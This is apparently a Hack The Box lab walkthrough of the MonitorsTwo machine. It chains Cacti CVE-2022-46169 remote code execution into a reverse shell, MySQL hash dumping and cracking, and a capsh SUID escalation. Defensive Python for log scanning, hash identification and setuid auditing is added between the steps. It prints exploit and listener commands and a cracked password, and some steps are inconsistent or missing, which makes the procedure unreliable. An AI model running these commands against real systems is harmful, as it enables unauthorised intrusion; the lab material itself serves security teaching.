MonitorsTwo is an Easy-difficulty Linux machine on Hack The Box that offers a comprehensive exploration of various vulnerabilities and misconfigurations. It starts off with a web application, Cacti v1.2.22, that is vulnerable to unauthenticated remote code execution through a malicious X-Forwarded-For header (CVE-2022-46169). The resulting shell provides access to a Docker container which has a misconfigured /sbin/capsh binary with the SUID bit set, as well as MySQL credentials that are used to dump user hashes for SSH access to the host machine. On this host, an outdated version of Docker allows a lower-privileged user to leverage the root access of a container to copy a SUID binary, leading to privilege escalation on the host (CVE-2021-41091).

Enumeration

The first step in attacking any machine is the information-gathering process. For this, I used nmap to collect all open ports and running services.

nmap -sCV -p- monitorstwo.htb -oA m2cv-scan
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The -sCV flag is nmap shorthand for ‘-sC -sV’. -sC runs the default set of Nmap Scripting Engine (NSE) scripts, gathering additional information about services, potential vulnerabilities, and misconfigurations; -sV is version/service detection, which attempts to identify the services running on open ports; and -p- scans all 65,535 TCP ports.

 
The results indicate two open ports:

  • Port 22 (SSH) – OpenSSH 8.2p1
  • Port 80 (HTTP) – an Nginx server with Cacti installed

Web Exploitation – CVE-2022-46169 (Cacti RCE)

 
Next, visiting http://monitorstwo.htb shows the Cacti 1.2.22 login page.

A quick Google search shows Exploit-DB and GitHub pages revealing an unauthenticated RCE vulnerability in Cacti v1.2.22 that is triggered through a malicious X-Forwarded-For header.
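
As an added defensive example (not code from the original writeup or from the Cacti project), the following Python scans nginx access-log lines for the abuse pattern behind this CVE: a request from a client that is not the trusted reverse proxy carrying an X-Forwarded-For value that claims a loopback or private origin. The log format, the trusted-proxy address and the sample log lines are constructed assumptions.

```python
import ipaddress
import re

# Constructed sample nginx access-log lines (not captured from the real machine).
# Assumed log_format: '$remote_addr - [$time_local] "$request" $status "$http_x_forwarded_for"'
SAMPLE_LOG = """\
203.0.113.7 - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 "-"
203.0.113.7 - [01/Jan/2024:10:00:02 +0000] "POST /index.php HTTP/1.1" 200 "198.51.100.9"
198.51.100.23 - [01/Jan/2024:10:00:03 +0000] "GET /graph_view.php HTTP/1.1" 200 "127.0.0.1"
198.51.100.23 - [01/Jan/2024:10:00:04 +0000] "GET /graph_view.php HTTP/1.1" 200 "198.51.100.23, 10.0.0.5"
198.51.100.23 - [01/Jan/2024:10:00:05 +0000] "GET /graph_view.php HTTP/1.1" 200 "not-an-ip"
10.0.0.2 - [01/Jan/2024:10:00:06 +0000] "GET /index.php HTTP/1.1" 200 "10.0.0.9"
"""

# Assumed: only this reverse proxy legitimately sets X-Forwarded-For on the way to Cacti.
TRUSTED_PROXIES = {"10.0.0.2"}

# Origins a remote client has no business claiming (explicit list: ip.is_private would also flag the TEST-NET samples).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16", "::1/128")]

LINE_RE = re.compile(r'^(?P<remote>\S+) - \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
                     r'(?P<status>\d{3}) "(?P<xff>[^"]*)"$')

def claims_internal(value):
    """True if any hop of an X-Forwarded-For chain is an internal address, or is not an
    IP address at all (a malformed value is treated as hostile rather than ignored)."""
    for hop in (h.strip() for h in value.split(",")):
        try:
            ip = ipaddress.ip_address(hop)
        except ValueError:
            return True
        if any(ip in net for net in INTERNAL_NETS):
            return True
    return False

def scan(log_text):
    """Return parsed records where an untrusted client supplied an X-Forwarded-For
    value claiming an internal origin; those are the requests to investigate."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; a production pipeline should count these too
        rec = m.groupdict()
        if rec["xff"] == "-" or rec["remote"] in TRUSTED_PROXIES:
            continue
        if claims_internal(rec["xff"]):
            hits.append(rec)
    return hits
```

On the proxy itself the fix is to overwrite the header with `proxy_set_header X-Forwarded-For $remote_addr;` rather than passing through whatever the client sent, and to upgrade Cacti to a release that fixes CVE-2022-46169.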
 

Searching via Searchsploit, I was able to locate a python module for Metasploit. Rapid7 has also posted this exploit for Cacti 1.2.22 Unauthenticated Remote Code Execution (RCE) here:
Instead of Metasploit, I used a manual Python proof-of-concept to better align with OSCP methodology:
 

Catching a Reverse Shell

 
python3 exploit.py --url http://monitorstwo.htb --rhost YOUR_IP --lport YOUR_PORT
The arguments of this PoC take the URL of the vulnerable host (-u http://monitorstwo.htb) and the local host and port to which the shell is sent back (--LHOST=10.10.14.5 --LPORT=443).
Before the exploit is run, I need a listener on my Kali machine to catch the shell. For this I used `nc -lvnp 443`. 443 is the port nc is listening on, which is also the port commonly used for HTTPS; hosting the listener on this port adds a hint of stealth to the exploitation process.

Before running the script, I start the listener on my attacker machine:

sudo nc -lvnp YOUR_PORT

Once executed, this gives a reverse shell as www-data inside a Docker container. The hostname of this machine is a random alphanumeric string, which leads me to believe it is a Docker container.

Docker Container Enumeration

Here, I opted for automatic enumeration of the container via LinPEAS, uploaded through a Python HTTP server.

In the root directory of this container is entrypoint.sh. Looking inside it reveals MySQL commands and credentials.

I copy the command to list all of the tables and identify a user_auth table. The follow-up command is SELECT * FROM user_auth. In this table I find the database password hashes, obtained by modifying the mysql command shown in entrypoint.sh.
 
 

Cracking the MySQL Hash

This gets cracked instantly through one of my favorite websites, hashes.com.

 

What if the hash is not found on this website?

It is also common to crack such a hash locally with John the Ripper or Hashcat. First, the hash needs to be identified as a specific algorithm; it is then run against password lists (or, for unsalted formats only, rainbow tables).
 

Identifying the Hash Type

I used the hash identifier on hashes.com and cross-referenced the result with Hashcat.

Both of these resources identify the hash as bcrypt (Blowfish-based).


Digesting this command:
hashcat -m 3200 marcus.hash /usr/share/wordlists/rockyou.txt
  • -m 3200 sets the hash mode; each hash type has its own mode number, and 3200 is bcrypt.
  • marcus.hash is a file that contains only the hash.
  • /usr/share/wordlists/rockyou.txt is the path to my list of passwords.
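
To make the identification step concrete, here is an added Python example (mine, not from the writeup, hashes.com or Hashcat) that parses crypt-style hash strings, maps each to its hashcat mode, and exposes the work factor a cracker pays per guess, with a defender's check for a weak bcrypt cost. The sample hashes are constructed and are not the hash recovered from the machine.

```python
import re

# Hashcat modes for the crypt(3)-style formats a Linux/Cacti assessment commonly turns up;
# 3200 is the bcrypt mode used in the hashcat command above.
CRYPT_FORMATS = {"1": ("md5crypt", 500), "5": ("sha256crypt", 7400), "6": ("sha512crypt", 1800),
                 "2a": ("bcrypt", 3200), "2b": ("bcrypt", 3200), "2y": ("bcrypt", 3200)}

# bcrypt: $2y$<cost>$<22-char salt><31-char digest>, radix-64 alphabet ./A-Za-z0-9
BCRYPT_RE = re.compile(r"^\$(2[aby])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")
# md5crypt / sha256crypt / sha512crypt: $<id>$[rounds=N$]<salt>$<digest>
CRYPT_RE = re.compile(r"^\$([156])\$(?:rounds=(\d+)\$)?([^$]{1,16})\$([./A-Za-z0-9]+)$")

def identify(h):
    """Return {name, hashcat_mode, cost, iterations, salt}, or None if unrecognised.
    'iterations' is the work an attacker pays per guess: 2**cost for bcrypt, the
    rounds= value (default 5000) for sha256/512crypt, a fixed 1000 for md5crypt."""
    m = BCRYPT_RE.match(h)
    if m:
        variant, cost, salt, _digest = m.groups()
        name, mode = CRYPT_FORMATS[variant]
        return {"name": name, "hashcat_mode": mode, "cost": int(cost),
                "iterations": 2 ** int(cost), "salt": salt}
    m = CRYPT_RE.match(h)
    if m:
        ident, rounds, salt, _digest = m.groups()
        name, mode = CRYPT_FORMATS[ident]
        iterations = 1000 if ident == "1" else (int(rounds) if rounds else 5000)
        return {"name": name, "hashcat_mode": mode, "cost": None,
                "iterations": iterations, "salt": salt}
    return None

def weak_cost(info, min_bcrypt_cost=10):
    """Defender's check: a bcrypt cost below the floor makes offline cracking cheap."""
    return info is not None and info["name"] == "bcrypt" and info["cost"] < min_bcrypt_cost

# Constructed sample hashes: syntactically valid, NOT the hash recovered from the machine.
SAMPLES = ["$2y$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234",
           "$2b$04$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234",
           "$6$rounds=100000$saltsalt$abcDEF",
           "5f4dcc3b5aa765d61d8327deb882cf99"]  # raw MD5 hex, not a crypt string

if __name__ == "__main__":
    for h in SAMPLES:
        info = identify(h)
        print(h[:12], "->", "unrecognised" if info is None else
              f'{info["name"]} -m {info["hashcat_mode"]} iterations={info["iterations"]} weak={weak_cost(info)}')
```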
 
 
 

SSH Access & Host Escalation

Logging in over SSH as Marcus with the cracked password funkymonkey.


Once I am logged into Marcus’ account on MonitorsTwo, there is a ‘You have mail.’ notification. In common Linux distributions, mail is found in the /var/mail directory.

This email lists three CVEs, and my hunch is that the Docker container can be exploited. First, I will try the CVE related to Docker.
 

 

Following this guide:
 
I confirmed the presence of /sbin/capsh with the SUID bit set, then leveraged it to spawn a root shell. Within the container I ran this command found on GTFOBins:
capsh --gid=0 --uid=0 --

For this exploit to work, I first set the SUID bit on the bash executable within the Docker container. In simple terms, this means that anyone who runs /bin/bash inside the MonitorsTwo container inherits the privileges of the file’s owner. This allows me to escalate privileges to root in this Docker container by spawning a bash shell.

This successfully escalated privileges to root, granting full control over MonitorsTwo.
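
From the defender's side, the question is whether any setuid binary in a container image or on the host can hand out root this way. The following Python audit is an added example, not part of the writeup: it walks a filesystem tree and flags setuid/setgid regular files, with capsh and the common shells on an assumed watch-list that you would extend for your own environment.

```python
import os
import stat

# Setuid binaries that hand the owner's privileges straight to the caller: capsh can set
# uid/gid (the /sbin/capsh case above) and a shell simply runs as its owner (the chmod
# u+s /bin/bash case). Assumed watch-list for this example; extend it from GTFOBins.
RISKY_SUID_NAMES = {"capsh", "bash", "sh", "dash", "zsh", "python3", "perl", "find", "vim", "env"}

def classify_suid(path, mode, uid):
    """Classify one file from its st_mode and owner uid: None when neither setuid nor
    setgid is set, "setuid-nonroot" when the owner is not root, "known-risky" for a
    watch-listed name owned by root, and "review" for any other root-owned case."""
    if not mode & (stat.S_ISUID | stat.S_ISGID):
        return None
    if uid != 0:
        return "setuid-nonroot"
    return "known-risky" if os.path.basename(path) in RISKY_SUID_NAMES else "review"

def audit_tree(root):
    """Walk a tree (the host, or a container rootfs exported and unpacked on the host)
    and return (path, octal permission bits, verdict) for every regular file that
    carries a setuid or setgid bit."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            p = os.path.join(dirpath, fn)
            try:
                st = os.lstat(p)  # lstat: never follow symlinks out of the tree
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            verdict = classify_suid(p, st.st_mode, st.st_uid)
            if verdict is not None:
                findings.append((p, oct(stat.S_IMODE(st.st_mode)), verdict))
    return findings

if __name__ == "__main__":
    import sys
    for path, mode, verdict in audit_tree(sys.argv[1] if len(sys.argv) > 1 else "/"):
        print(f"{verdict:15} {mode} {path}")
```

Run it against a container's exported rootfs before deployment: a "known-risky" hit on capsh or a shell is exactly the condition this box relies on, and a "review" hit deserves a reason to exist.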
 

Conclusion

MonitorsTwo is a fantastic practice machine that simulates a real-world attack chain—from unauthenticated web RCE to Docker escape and host root access. Key takeaways include:

  • Exploiting CVE-2022-46169 via custom headers

  • Using Docker misconfigurations to pivot

  • Cracking MySQL hashes for lateral movement

  • Escalating privileges via CVE-2021-41091